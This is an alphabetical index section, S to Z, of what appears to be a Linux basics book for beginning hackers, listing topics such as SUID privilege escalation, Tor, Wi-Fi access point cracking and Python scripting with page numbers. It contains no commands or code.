SATA (Serial ATA) drives, 105
/sbin directory, 4
Schneier, Bruce, 147
script kiddies, 181
scripts
defined, 2
open port scanning script, 87–91
Python scripting, 181–200
simple message script, 84–87
using AI for scripting, 206–207
SCSI (Small Computer System Interface) drives, 105
sda drive label, 105
SDP (Service Discovery Protocol), 160–161
sdptool tool, 160–161
searching, 8–12
find command, 10–11
finding and replacing text, 21–23
grep command, 11–12
locate command, 9
whereis command, 9
which command and PATH variable, 9–10
Secure Shell. See SSH
sed command, 21–23
select command, 131

SELECT command, 135
semicolon (;), 131, 133
Serial ATA (SATA) drives, 105
Service Discovery Protocol (SDP), 160–161
services, 123–135. See also Apache; MariaDB; MySQL; OpenSSH;
Raspberry Pi
defined, 123
starting, stopping, restarting, 124
service set identifier (SSID), 152, 154, 157
set command, 74, 92
set user ID bit. See SUID bit
SGID (set group ID) bit, 58
shebang (#!), 84, 86
shells. See also bash shell
changing default, 72–73, 82–83
changing prompt, 76–77
defined, 2–3, 82
GUIs vs., 82
variables
defined, 71
viewing, 74
shift command, 92
shred command, 118–119
shredding logs, 118–119

SIGHUP kill signal, 67, 67
SIGINT kill signal, 67
SIGKILL kill signal, 67, 67
SIGQUIT kill signal, 67
SIGTERM kill signal, 66, 67
Small Computer System Interface (SCSI) drives, 105
social engineering, 203, 205–206
software, 39–48
adding repositories to sources.list file, 43–44
installing
with apt, 40–41
with git, 47
with GUI-based installers, 45–46
removing, 41–42
software packages
defined, 39
purging, 41–42
searching for, 40
updating, 42
upgrading, 42–43
sorted() function, 187
SourceForge, 190
sources.list file, adding repositories to, 43–44
SQL, interacting with, 131

ss command, 30, 30
SSH (Secure Shell)
defined, 127
remote spying camera, 127–129
SSID (service set identifier), 152, 154, 157
sticky bit, 58
stop command, 156
storage device management, 103–109
/dev directory, 104–107
block devices, 107–108
character devices, 107
logical labels, 105, 105, 106
major and minor numbers, 105–106
mount points, 108
partitions, 105–107
USB devices, 108
mounting devices, 104, 108–109
manually, 109
mount points, 108
unmounting, 109
viewing information about mounted disks, 109–110
strip() function, 199
-sT switch, 88
sudo command, xix, 9, 31

SUID (set user ID) bit
defined, 57
granting temporary root permissions with, 57
privilege escalation, 58–59
superuser account. See root account
supply chain attacks, 204
Synaptic, 45–46
sysctl command, 165–167
/sys directory, 4
syslog daemon (syslogd), 114, 120
systemd suite, xix–xx, 114
SysV utilities, xix–xx
T
tail command, 19–20
tar command, 96–98
tar files (tape archive files; tarballs)
creating, 96–97
extracting files from, 97–98
viewing files from, 97
TCP clients, 190–192
TCP connect scanning, 88
TCP listeners, 192–193

telnet, 127
terminal, 2–3
test command, 92
text, 17–25
filtering, 21
finding and replacing, 21–23
numbering lines, 20–21
viewing
first lines, 18–19
last lines, 19–20
one page and paging down, 23
one page and scrolling or filtering, 24–25
text editors, 84
times command, 92
top command, 64, 66–67
Tor (The Onion Router) system, 139–141
Ahmia search engine, 141, 141
dark web, 140–141
encrypted traffic data, 139–140
installing Tor browser, 140, 140
security concerns, 141
Torrent, xxviii
Torvalds, Linus, xxvii
touch command, 14

traceroute command, 138–139
traffic correlation, 141
transparency, xxvi
trap command, 92
try/except structure, 197–199
–t switch
netstat command, 29
tar command, 97
type command, 92
type() function, 187
U
UGO syntax, changing permissions with, 54–55
umask command, 56–57, 92
umount command, 109
union command, 131
unmounting (ejecting) devices, 109
unset command, 80, 92
update command, 42, 131
updatedb command, 9
upgrade keyword, 42
USB devices, checking for, 108
user land, 163

US Office of Naval Research (ONR), 139
/usr directory, 4
-u switch
journalctl utility, 116
netstat command, 116
\u value, 77
V
variables
adding functionality to scripts with, 86
adding to scripts, 90–91
defined, 86
environment, 71–80
naming, 90
Python, 184–186
VirtualBox
installing, xxix, xxxii
setting up, xxix–xxx, xxx
Vision, Max (Max Butler), 88
VMs (virtual machines), xxviii–xxxii
VPNs (virtual private networks), 147–148
–v switch, 97–98
vulnerability assessments, xxv

W
wait command, 92
WAMP (Windows, Apache, MySQL, and PHP), 125
WEP (Wired Equivalent Privacy), 152
whereis command, 9
which command, 9–10
while loop, 195
white hat hacking, xxv–xxvi
defined, 87
military and espionage, xxvi
penetration testing, xxv
whoami command, 5
Wi-Fi networks, 152–157
basic commands, 152–155
connecting to APs, 154–155
cracking APs, 155–157
frequency of, 158
modes, 158
power of, 158
range of, 158
security protocols, 158
terminology, 158
viewing APs, 153–154

viewing interfaces and statistics, 153
Wi-Fi Protected Access (WPA), 152
wildcards, 11
Windows, Apache, MySQL, and PHP (WAMP), 125
Windows Subsystem for Linux (WSL), xxxvii–xxxviii
Wired Equivalent Privacy (WEP), 152
wireless networks, 151–162
WPA (Wi-Fi Protected Access), 152
WPA2-PSK, 152
WPA3, 152
w permission, 50, 52
WSL (Windows Subsystem for Linux), xxxvii–xxxviii
\w value, 77
X
X (formerly Twitter), 203
x permission, 50, 52
XSS (cross-site scripting), 124
–x switch, tar command, 97
Z
zombie processes, 66
Z shell (zsh), xx, 73, 82

OceanofPDF.com